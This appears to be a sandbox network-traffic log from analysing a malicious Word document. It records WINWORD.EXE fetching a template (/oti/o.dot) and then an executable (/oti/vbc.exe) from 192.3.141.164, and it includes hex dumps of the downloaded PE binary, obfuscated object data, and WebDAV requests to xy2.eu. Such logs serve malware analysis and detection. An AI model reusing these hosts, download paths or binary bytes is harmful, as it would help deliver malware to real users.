Jun 11, 2021 15:59:26.283797026 CEST	40	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: {\object\CJGDTLFBXIRTZZKivjfhoqlwzyaambebatidefkyb93787878346
Jun 11, 2021 15:59:26.283817053 CEST	42	IN	Data Raw: 0a 65 64 62 09 35 39 09 35 09 34 39 0d 0a 35 35 0d 0a 63 0d 0a 64 09 37 61 0d 0a 62 61 34 36 39 0a 0a 63 32 0a 0a 39 61 09 31 09 35 20 63 20 36 20 36 0d 0a 36 35 32 34 20 65 0a 0a 62 65 64 31 35 0a 0a 34 38 0d 0a 63 36 20 38 37 61 33 0d 0a 39 39 Data Ascii: edb5954955cd7aba469c29a15 c 6 66524 ebed1548c6 87a399a7a86978a f4449b1f 50954c01a2fcff14b5507a1ad6312 6e2da28025e 9fd0100005287 4120c157 1a3f d 27630 2e5f7892
Jun 11, 2021 15:59:26.283839941 CEST	43	IN	Data Raw: 0a 0d 35 35 65 0a 0d 31 0a 0d 62 35 09 63 09 62 34 64 09 33 66 37 33 64 33 39 09 36 0a 0d 34 34 0d 0d 37 09 33 39 0d 0d 33 63 63 37 09 61 0d 0d 32 66 61 39 35 09 32 0d 0d 35 65 09 38 31 63 34 39 31 20 61 20 33 09 65 09 63 20 65 37 0d 0d 32 65 09 Data Ascii: 55e1b5cb4d3f73d396447393cc7a2fa9525e81c491 a 3ec e72e6ed0a b5c97ba770beb95ce 3 36def 8 20c913cfc567f197491577e3a456a0 c f33d7 a47d5c603d 9edf37 2
Jun 11, 2021 15:59:26.283863068 CEST	44	IN	Data Raw: 30 0a 0d 30 38 31 0a 0d 63 0a 0d 33 38 62 0a 0d 35 66 30 30 0a 0d 30 20 30 0d 0d 35 38 20 35 20 62 0d 0d 39 30 09 39 09 64 09 65 20 62 0a 0d 33 20 38 65 62 0a 0d 31 32 65 0d 0d 62 0d 0d 63 30 65 20 62 09 32 36 65 62 0a 0d 63 65 09 65 62 0a 0d 62 Data Ascii: 0081c38b5f000 058 5 b909de b3 8eb12ebc0e b26ebceebbaeb1869c0f56a585bebeaebaeeb07eb 9 de 96 fffffffe97fffffff eb61eb1eeb d4eb dc6bc000eb02 2f7eeb0a90ebd2
Jun 11, 2021 15:59:26.283885956 CEST	46	IN	Data Raw: 66 0d 0d 37 35 20 33 35 0d 0d 35 32 32 39 33 63 20 33 36 0d 0d 33 0d 0d 37 20 62 61 0a 0a 33 20 33 09 65 0a 0a 62 32 35 34 35 39 09 30 0a 0a 61 31 09 39 30 0d 0a 39 31 09 62 66 0d 0a 62 0a 0a 31 20 35 0d 0d 34 0d 0d 32 0d 0d 35 0a 0d 35 61 30 0a Data Ascii: f75 3552293c 3637 ba3 3eb254590a19091bfb1 54255a03acf1039e6 c0 014b06656f6ac64 ef769704b 8104ec 6c2e48440 1a72 2a d9a8e647c07aa15ee58fb3151dd7bca0 f
Jun 11, 2021 15:59:26.283905983 CEST	46	IN	Data Raw: 31 09 64 38 36 63 36 65 09 37 36 0d 0d 34 09 39 0d 0d 37 66 64 66 09 62 09 30 0d 0d 39 0a 0a 65 09 63 39 0a 0a 38 09 63 36 66 65 0a 0d 38 32 65 66 09 31 37 30 38 0a 0d 62 0d 0d 33 0a 0d 63 39 30 66 20 34 63 0a 0d 38 0d 0d 32 0d 0a 32 34 38 38 62 Data Ascii: 1d86c6e76497fdfb09ec98c6fe82ef1708b3c90f 4c822488be5b15 2c13b24efcf a46d817e760141fbc7850142f 9ef8e470f335291a865aa767 8e 060ba04a73 6dc1 606000000
Jun 11, 2021 15:59:26.437504053 CEST	48	OUT	HEAD /oti/o.dot HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 192.3.141.164 Content-Length: 0 Connection: Keep-Alive
Jun 11, 2021 15:59:26.580729008 CEST	48	IN	HTTP/1.1 200 OK Date: Fri, 11 Jun 2021 13:59:26 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 Last-Modified: Fri, 11 Jun 2021 07:49:12 GMT ETag: "2ec2-5c478be5aba60" Accept-Ranges: bytes Content-Length: 11970 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49174	192.3.141.164	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 15:59:27.409079075 CEST	49	OUT	GET /oti/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.141.164 Connection: Keep-Alive
Jun 11, 2021 15:59:27.551704884 CEST	50	IN	HTTP/1.1 200 OK Date: Fri, 11 Jun 2021 13:59:27 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 Last-Modified: Fri, 11 Jun 2021 00:12:45 GMT ETag: "e5400-5c4725dfdba60" Accept-Ranges: bytes Content-Length: 939008 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1b aa c2 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a8 0b 00 00 a8 02 00 00 00 00 00 fe c5 0b 00 00 20 00 00 00 e0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 c5 0b 00 4b 00 00 00 00 00 0c 00 88 a3 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 5f c5 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a6 0b 00 00 20 00 00 00 a8 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 e0 0b 00 00 02 00 00 00 ac 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 a3 02 00 00 00 0c 00 00 a4 02 00 00 ae 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL` @ @K_ H.text `.sdata@.rsrc@@.relocR@B
Jun 11, 2021 15:59:27.551736116 CEST	52	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c5 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 24 49 01 00 62 b0 00 00 03 00 00 00 01 00 00 06 86 f9 01 00 d9 cb 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: H$Ib0+(G9J&-((((:<& 8("8" E8& 8(o*
Jun 11, 2021 15:59:27.551758051 CEST	53	IN	Data Raw: 06 2a 00 00 00 56 2b 09 28 3f 5f 73 56 14 16 9a 26 16 2d f9 00 28 22 03 00 06 2a 00 00 42 2b 09 28 1f 05 3e 40 14 16 9a 26 16 2d f9 17 2a 00 00 00 42 2b 09 28 df e2 11 3a 14 16 9a 26 16 2d f9 16 2a 00 00 00 13 30 03 00 ec 00 00 00 0d 00 00 11 2b Data Ascii: V+(?_sV&-("B+(>@&-B+(:&-0+($@&-(R(S:& 8C~ 81 ((Qo8s98k E)9?U (R:&~
Jun 11, 2021 15:59:27.551776886 CEST	54	IN	Data Raw: 00 00 00 00 00 7e 0d 00 00 04 0a 20 07 00 00 00 38 31 00 00 00 20 04 01 00 00 28 62 00 00 06 d0 0a 00 00 02 28 24 00 00 0a 6f 38 00 00 0a 73 39 00 00 0a 0c 38 ba ff ff ff 20 06 00 00 00 fe 0e 03 00 fe 0c 03 00 45 08 00 00 00 20 00 00 00 0a 00 00 Data Ascii: ~ 81 (b($o8s98 E 7 898& 8~(a 880+(\|=&-~8Z+(7&-*0<
Jun 11, 2021 15:59:27.551795959 CEST	56	IN	Data Raw: 00 c5 01 01 0f 00 00 00 00 56 2b 09 28 02 62 36 36 14 16 9a 26 16 2d f9 00 28 22 03 00 06 2a 00 00 66 2b 09 28 c3 30 4a 68 14 16 9a 26 16 2d f9 00 fe 09 00 00 28 33 00 00 0a 2a 00 00 42 2b 09 28 d0 26 25 2f 14 16 9a 26 16 2d f9 17 2a 00 00 00 42 Data Ascii: V+(b66&-("f+(0Jh&-(3B+(&%/&-B+(/I1&-b+(98&-(?V+(S/;&-(b+(d&-o@V+(d2&-(ub+(FuZ_&-oA*f+(~1
Jun 11, 2021 15:59:27.551811934 CEST	57	IN	Data Raw: 09 28 6e 70 2e 5a 14 16 9a 26 16 2d f9 00 7e 13 00 00 04 0b 07 39 15 00 00 00 02 03 28 82 00 00 06 0c 04 08 28 47 00 00 0a 0a 38 85 00 00 00 00 73 48 00 00 0a 0d 20 aa 01 00 00 28 dc 02 00 06 02 28 47 00 00 0a 13 04 03 6f 49 00 00 0a 13 05 38 2f Data Ascii: (np.Z&-~9((G8sH ((GoI8/(J ((K(GoL&(M:oNoO8*IQ0+(qf&-sH~P
Jun 11, 2021 15:59:27.551829100 CEST	58	IN	Data Raw: 38 39 00 00 00 20 74 02 00 00 28 8d 00 00 06 09 28 9a 00 00 06 0d 20 0d 00 00 00 17 3a 1d 00 00 00 26 00 00 09 28 95 00 00 06 13 04 38 77 00 00 00 20 02 00 00 00 fe 0e 08 00 fe 0c 08 00 45 10 00 00 00 3c 00 00 00 82 ff ff ff 7a 00 00 00 0c 00 00 Data Ascii: 89 t(( :&(8w E<z%Mn^. :&8& (:&( 89h 8n( 8]~P 8M
Jun 11, 2021 15:59:27.551846027 CEST	60	IN	Data Raw: 8e 00 00 06 3a 2d 00 00 00 26 08 0a 20 05 00 00 00 38 20 00 00 00 12 01 28 61 00 00 0a 28 a0 00 00 06 b7 0c 38 e1 ff ff ff 20 02 00 00 00 fe 0e 03 00 fe 0c 03 00 45 06 00 00 00 94 ff ff ff a1 ff ff ff 94 ff ff ff b7 ff ff ff c3 ff ff ff 0a 00 00 Data Ascii: :-& 8 (a(8 E 88V+(g2f&-("f+(@g&-(B+(S]&-B+(]&-b+(s7&-(2*f+(Y&-
Jun 11, 2021 15:59:27.551863909 CEST	61	IN	Data Raw: 16 8d 14 00 00 01 14 14 14 28 b4 00 00 06 14 20 f4 03 00 00 28 b3 00 00 06 16 8d 14 00 00 01 14 14 14 28 b4 00 00 06 14 20 00 04 00 00 28 dc 02 00 06 16 8d 14 00 00 01 14 14 14 28 b4 00 00 06 28 b6 00 00 06 0b 20 0c 00 00 00 28 b1 00 00 06 39 46 Data Ascii: ( (( ((( (9F&9 858~(i 898J E414~@$"H(:& 8
Jun 11, 2021 15:59:27.551881075 CEST	63	IN	Data Raw: 39 70 01 00 00 26 20 00 00 00 00 38 8b 00 00 00 11 04 16 91 3a d6 00 00 00 20 05 00 00 00 38 78 00 00 00 02 50 14 20 96 03 00 00 28 c6 00 00 06 16 8d 14 00 00 01 14 14 14 28 cb 00 00 06 14 20 9c 04 00 00 28 c6 00 00 06 16 8d 14 00 00 01 14 14 14 Data Ascii: 9p& 8: 8xP (( (( (%C%%%(&8[ E6C0& 88(
Jun 11, 2021 15:59:27.693886995 CEST	64	IN	Data Raw: 00 00 00 17 3a aa fe ff ff 26 00 00 00 00 00 11 07 17 d6 13 07 20 01 00 00 00 17 3a 93 fe ff ff 26 16 13 07 38 92 ff ff ff 11 06 11 07 9a 13 08 20 00 00 00 00 38 79 fe ff ff 38 1f 00 00 00 11 0a 16 9a 28 cd 00 00 06 d0 09 00 00 01 28 24 00 00 0a Data Ascii: :& :&8 8y8(($(t(8/& (:7& (( 8( 9&8*0$+(^hkM&- 8i:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49175	93.157.97.6	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 15:59:44.959641933 CEST	1044	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: DavClnt translate: f Host: xy2.eu
Jun 11, 2021 15:59:45.176253080 CEST	1046	IN	HTTP/1.1 200 OK date: Fri, 11 Jun 2021 13:59:45 GMT server: Apache x-powered-by: PHP/5.5.38 cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:59:45 GMT vary: Accept-Encoding transfer-encoding: chunked content-type: text/html Data Raw: 31 46 43 33 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 61 74 61 2d 61 64 2d 63 6c 69 65 6e 74 3d 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 20 73 72 63 3d 22 2f 2f 70 61 67 65 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 6a 73 2f 61 64 73 62 79 67 6f 6f 67 6c 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 28 61 64 73 62 79 67 6f 6f 67 6c 65 20 3d 20 77 69 6e 64 6f 77 2e 61 64 73 62 79 67 6f 6f 67 6c 65 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 5f 61 64 5f 63 6c 69 65 6e 74 3a 20 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 65 6e 61 62 6c 65 5f 70 61 67 65 5f 6c 65 76 65 6c 5f 61 64 73 3a 20 74 72 75 65 0d 0a 20 20 20 20 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 33 36 38 37 32 35 35 38 2d 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 0d 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 33 36 38 37 32 35 35 38 2d 37 27 29 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 2c 20 74 69 6e 79 2c 20 75 72 6c 2c 20 63 6f 6d 70 72 65 73 73 2c 20 6c 69 6e 6b 2c 20 62 69 74 6c 79 2c 20 73 68 61 72 65 2c 20 73 68 6f 72 74 65 6e 2c 20 73 61 76 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 6c 63 6f 6d 65 20 74 6f 20 58 59 32 2e 65 75 20 2d 20 44 6f 20 79 6f 75 20 68 61 76 65 20 65 6e 6f 75 67 68 20 6f 66 20 70 6f 73 74 69 6e 67 20 55 52 4c 73 20 69 6e 20 65 6d 61 69 6c 73 20 6f 6e 6c 79 20 74 6f 20 68 61 76 65 20 69 74 20 62 72 65 61 6b 20 77 68 65 6e 20 73 65 6e 74 20 63 61 75 73 69 6e 67 20 74 68 65 20 Data Ascii: 1FC3<!DOCTYPE html ><head><script async data-ad-client="ca-pub-2614556310778759" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script> (adsbygoogle = window.adsbygoogle \|\| []).push({ google_ad_client: "ca-pub-2614556310778759", enable_page_level_ads: true });</script> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-36872558-7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-36872558-7'); </script> <meta charset="UTF-8"> <meta name="robots" content="index, follow"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="keywords" content="short, tiny, url, compress, link, bitly, share, shorten, save"> <meta name="description" content="Welcome to XY2.eu - Do you have enough of posting URLs in emails only to have it break when sent causing the
Jun 11, 2021 15:59:45.176311016 CEST	1047	IN	Data Raw: 72 65 63 69 70 69 65 6e 74 20 74 6f 20 68 61 76 65 20 74 6f 20 63 75 74 20 61 6e 64 20 70 61 73 74 65 20 69 74 20 62 61 63 6b 20 74 6f 67 65 74 68 65 72 3f 20 57 65 20 77 69 6c 6c 20 63 72 65 61 74 65 20 61 20 74 69 6e 79 20 55 52 4c 20 74 68 61 Data Ascii: recipient to have to cut and paste it back together? We will create a tiny URL that will not break in email postings and never expires. Our site is also mobile friendly!"> <meta name="viewport" content="width=device-width, initial-scale=1">
Jun 11, 2021 15:59:45.176368952 CEST	1049	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 67 66 78 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d Data Ascii: <link rel="shortcut icon" href="/gfx/favicon.png"> <link rel="stylesheet" href="/css/style.css"> <link href="https://fonts.googleapis.com/css?family=Courgette%7CAcme%7CMontserrat&subset=latin-ext" rel="stylesheet"> ... Counter
Jun 11, 2021 15:59:45.176410913 CEST	1050	IN	Data Raw: 2f 2f 74 69 6e 79 75 72 6c 2e 6d 6f 62 69 22 3e 54 69 6e 79 55 52 4c 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 68 6f 72 74 2d 77 72 61 70 70 65 72 2d 62 61 63 6b 67 72 6f 75 6e Data Ascii: //tinyurl.mobi">TinyURL</a></div></div><div class="short-wrapper-background" style="text-align: center"><div class="short-wrapper"><div class="container" style="background-color: transparent; padding-top: 60px; padding-bottom: 60px
Jun 11, 2021 15:59:45.176453114 CEST	1051	IN	Data Raw: 58 59 32 2e 65 75 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a Data Ascii: XY2.eu</b></div><div style="padding-bottom: 15px; font-style: italic; font-size: 14px" class="text">*No PayPal account required</div><form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"><input type="hidden" na
Jun 11, 2021 15:59:45.176492929 CEST	1053	IN	Data Raw: 20 79 6f 75 72 20 6c 69 6e 6b 73 20 74 6f 6f 6c 62 61 72 2e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 22 3e 3c 62 3e 3c 61 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 Data Ascii: your links toolbar.</div><div style="padding: 10px;"><b><a style="font-size: 22px;" href="javascript:void(location.href='http://xy2.eu/create.php?url='+encodeURIComponent(location.href))">XY2.eu</a></b></div><div class="text">By clicking
Jun 11, 2021 15:59:45.176522970 CEST	1053	IN	Data Raw: 20 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 61 70 70 73 2f 64 65 74 61 69 6c 73 3f 69 Data Ascii: </b></div><a target="_blank" href="https://play.google.com/store/apps/details?id=com.myportal.URLShortener"><img src="/gfx/qr-app.png" alt="Scan this QR code with your mobile device"/></a></div>...<div class="container" style="text-a

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49176	93.157.97.6	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 16:00:10.156811953 CEST	1054	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: DavClnt translate: f Host: xy2.eu
Jun 11, 2021 16:00:12.184010029 CEST	1055	IN	HTTP/1.1 200 OK date: Fri, 11 Jun 2021 14:00:10 GMT server: Apache x-powered-by: PHP/5.5.38 cache-control: max-age=0 expires: Fri, 11 Jun 2021 14:00:10 GMT vary: Accept-Encoding transfer-encoding: chunked content-type: text/html Data Raw: 31 46 43 33 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 61 74 61 2d 61 64 2d 63 6c 69 65 6e 74 3d 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 20 73 72 63 3d 22 2f 2f 70 61 67 65 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 6a 73 2f 61 64 73 62 79 67 6f 6f 67 6c 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 28 61 64 73 62 79 67 6f 6f 67 6c 65 20 3d 20 77 69 6e 64 6f 77 2e 61 64 73 62 79 67 6f 6f 67 6c 65 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 5f 61 64 5f 63 6c 69 65 6e 74 3a 20 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 65 6e 61 62 6c 65 5f 70 61 67 65 5f 6c 65 76 65 6c 5f 61 64 73 3a 20 74 72 75 65 0d 0a 20 20 20 20 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 33 36 38 37 32 35 35 38 2d 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 0d 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 33 36 38 37 32 35 35 38 2d 37 27 29 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 